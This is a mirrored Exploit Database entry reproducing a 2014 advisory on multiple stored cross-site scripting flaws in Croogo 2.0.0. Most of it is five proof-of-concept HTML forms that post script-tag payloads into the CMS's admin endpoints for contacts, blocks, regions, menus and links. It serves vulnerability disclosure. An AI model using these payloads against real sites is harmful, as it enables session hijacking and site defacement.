Croogo 2.0.0 – Multiple Persistent Cross-Site Scripting Vulnerabilities

• Exploit Database
• 13 阅读

• 作者： LiquidWorm
  日期： 2014-10-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/34959/

• <<<
  
  Croogo 2.0.0 Multiple Stored XSS Vulnerabilities
  
  
  Vendor: Fahad Ibnay Heylaal
  Product web page: http://www.croogo.org
  Affected version: 2.0.0
  
  Summary: Croogo is a free, open source, content management system
  for PHP, released under The MIT License. It is powered by CakePHP
  MVC framework.
  
  Desc: Croogo version 2.0.0 suffers from multiple stored cross-site
  scripting vulnerabilities. Input passed to several POST parameters
  is not properly sanitised before being returned to the user. This
  can be exploited to execute arbitrary HTML and script code in a
  user's browser session in context of an affected site.
  
  Tested on: Apache/2.4.7 (Win32)
   PHP/5.5.6
   MySQL 5.6.14
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  Zero Science Lab - http://www.zeroscience.mk
  Macedonian Information Security Research And Development Laboratory
  
  
  Advisory ID: ZSL-2014-5201
  Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5201.php
  
  Vendor: http://blog.croogo.org/blog/croogo-210-released
  
  
  26.07.2014
  
  >>>
  
  
  ------------------------
  (XSS #1)
  --------
  POST parameters:
  
   - data[Contact][title]
  ------------------------
  
  <html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
  <form action="http://localhost/croogo/admin/contacts/contacts/add" method="POST">
  <input type="hidden" name="_method" value="POST" />
  <input type="hidden" name="data[_Token][key]" value="2627e9e204ad6b878dbaf1c08d830c3e744d7e6e" />
  <input type="hidden" name="data[Contact][id]" value="" />
  <input type="hidden" name="data[Contact][title]" value=""><script>alert("XSS");</script>" />
  <input type="hidden" name="data[Contact][alias]" value="test" />
  <input type="hidden" name="data[Contact][email]" value="a@a.com" />
  <input type="hidden" name="data[Contact][body]" value="" />
  <input type="hidden" name="data[Contact][name]" value="" />
  <input type="hidden" name="data[Contact][position]" value="" />
  <input type="hidden" name="data[Contact][address]" value="" />
  <input type="hidden" name="data[Contact][address2]" value="" />
  <input type="hidden" name="data[Contact][state]" value="" />
  <input type="hidden" name="data[Contact][country]" value="" />
  <input type="hidden" name="data[Contact][postcode]" value="" />
  <input type="hidden" name="data[Contact][phone]" value="" />
  <input type="hidden" name="data[Contact][fax]" value="" />
  <input type="hidden" name="data[Contact][message_status]" value="0" />
  <input type="hidden" name="data[Contact][message_archive]" value="0" />
  <input type="hidden" name="data[Contact][message_notify]" value="0" />
  <input type="hidden" name="data[Contact][message_spam_protection]" value="0" />
  <input type="hidden" name="data[Contact][message_captcha]" value="0" />
  <input type="hidden" name="data[Contact][status]" value="0" />
  <input type="hidden" name="data[_Token][fields]" value="262e37f00fdd538ab98d168114e8befb72ba27ff%3AContact.id" />
  <input type="hidden" name="data[_Token][unlocked]" value="apply" />
  <input type="submit" value="Submit form" />
  </form>
  </body>
  </html>
  
  
  ------------------------
  (XSS #2)
  --------
  POST/PUT parameters:
  
   - data[Block][title]
   - data[Block][alias]
  ------------------------
  
  <html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
  <form action="http://localhost/croogo/admin/blocks/blocks/edit/10" method="POST">
  <input type="hidden" name="_method" value="PUT" />
  <input type="hidden" name="data[_Token][key]" value="bb5e47ab63281908e9783d9a20f66b7f56c573f3" />
  <input type="hidden" name="data[Block][id]" value="10" />
  <input type="hidden" name="data[Block][title]" value=""><script>alert(2);</script>" />
  <input type="hidden" name="data[Block][alias]" value=""><script>alert(3);</script>" />
  <input type="hidden" name="data[Block][region_id]" value="3" />
  <input type="hidden" name="data[Block][body]" value="1" />
  <input type="hidden" name="data[Block][class]" value="1" />
  <input type="hidden" name="data[Block][element]" value="1" />
  <input type="hidden" name="data[Role][Role]" value="" />
  <input type="hidden" name="data[Block][visibility_paths]" value="" />
  <input type="hidden" name="data[Block][params]" value="1" />
  <input type="hidden" name="data[Block][status]" value="1" />
  <input type="hidden" name="data[Block][show_title]" value="0" />
  <input type="hidden" name="data[Block][show_title]" value="1" />
  <input type="hidden" name="data[Block][publish_start]" value="0000-00-00 00:00:00" />
  <input type="hidden" name="data[Block][publish_end]" value="0000-00-00 00:00:00" />
  <input type="hidden" name="data[_Token][fields]" value="546f4a46648b8b32ea4c2b43a4a118ea7087e21b%3ABlock.id" />
  <input type="hidden" name="data[_Token][unlocked]" value="apply" />
  <input type="submit" value="Submit form" />
  </form>
  </body>
  </html>
  
  
  ------------------------
  (XSS #3)
  --------
  POST parameters:
  
   - data[Region][title]
  ------------------------
  
  <html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
  <form action="http://localhost/croogo/admin/blocks/regions/add" method="POST">
  <input type="hidden" name="_method" value="POST" />
  <input type="hidden" name="data[_Token][key]" value="a7d62c8c34e2a6414c3657c43790645dfdd63735" />
  <input type="hidden" name="data[Region][id]" value="" />
  <input type="hidden" name="data[Region][title]" value=""><script>alert(11);</script>" />
  <input type="hidden" name="data[Region][alias]" value="1" />
  <input type="hidden" name="data[_Token][fields]" value="4020bcbfbf5ba648b159ec8a4e166f53c1b58aa4%3ARegion.id" />
  <input type="hidden" name="data[_Token][unlocked]" value="apply" />
  <input type="submit" value="Submit form" />
  </form>
  </body>
  </html>
  
  
  ------------------------
  (XSS #4)
  --------
  POST parameters:
  
   - data[Menu][title]
   - data[Menu][alias]
  ------------------------
  
  <html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
  <form action="http://localhost/croogo/admin/menus/menus/add" method="POST">
  <input type="hidden" name="_method" value="POST" />
  <input type="hidden" name="data[_Token][key]" value="253c5c67942b2d126c886c9ac7a62ebf065cf42b" />
  <input type="hidden" name="data[Menu][id]" value="" />
  <input type="hidden" name="data[Menu][title]" value=""><script>alert(22);</script>" />
  <input type="hidden" name="data[Menu][alias]" value=""><script>alert(33);</script>" />
  <input type="hidden" name="data[Menu][description]" value="ZSL" />
  <input type="hidden" name="data[Menu][params]" value="1" />
  <input type="hidden" name="data[Menu][status]" value="1" />
  <input type="hidden" name="data[Menu][publish_start]" value="1" />
  <input type="hidden" name="data[Menu][publish_end]" value="1" />
  <input type="hidden" name="data[_Token][fields]" value="58685dc7a49f7617cffaa3a00ec4245516c5f9d3%3AMenu.id" />
  <input type="hidden" name="data[_Token][unlocked]" value="apply" />
  <input type="submit" value="Submit form" />
  </form>
  </body>
  </html>
  
  
  ------------------------
  (XSS #5)
  --------
  POST parameters:
  
   - data[Link][title]
  ------------------------
  
  <html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
  <form action="http://localhost/croogo/admin/menus/links/add/menu:6" method="POST">
  <input type="hidden" name="_method" value="POST" />
  <input type="hidden" name="data[_Token][key]" value="736e7539497307010b8cb8e70c44ec8a9798d0fb" />
  <input type="hidden" name="data[Link][id]" value="" />
  <input type="hidden" name="data[Link][menu_id]" value="6" />
  <input type="hidden" name="data[Link][parent_id]" value="" />
  <input type="hidden" name="data[Link][title]" value=""><script>alert(1);</script>" />
  <input type="hidden" name="data[Link][link]" value="1" />
  <input type="hidden" name="data[Role][Role]" value="" />
  <input type="hidden" name="data[Link][class]" value="scriptalert1script" />
  <input type="hidden" name="data[Link][description]" value="" />
  <input type="hidden" name="data[Link][rel]" value="" />
  <input type="hidden" name="data[Link][target]" value="" />
  <input type="hidden" name="data[Link][params]" value="" />
  <input type="hidden" name="data[Link][status]" value="0" />
  <input type="hidden" name="data[Link][publish_start]" value="" />
  <input type="hidden" name="data[Link][publish_end]" value="" />
  <input type="hidden" name="data[_Token][fields]" value="d662745abb348c763337f58c8c3c28bb1e8c014f%3ALink.id" />
  <input type="hidden" name="data[_Token][unlocked]" value="apply" />
  <input type="submit" value="Submit form" />
  </form>
  </body>
  </html>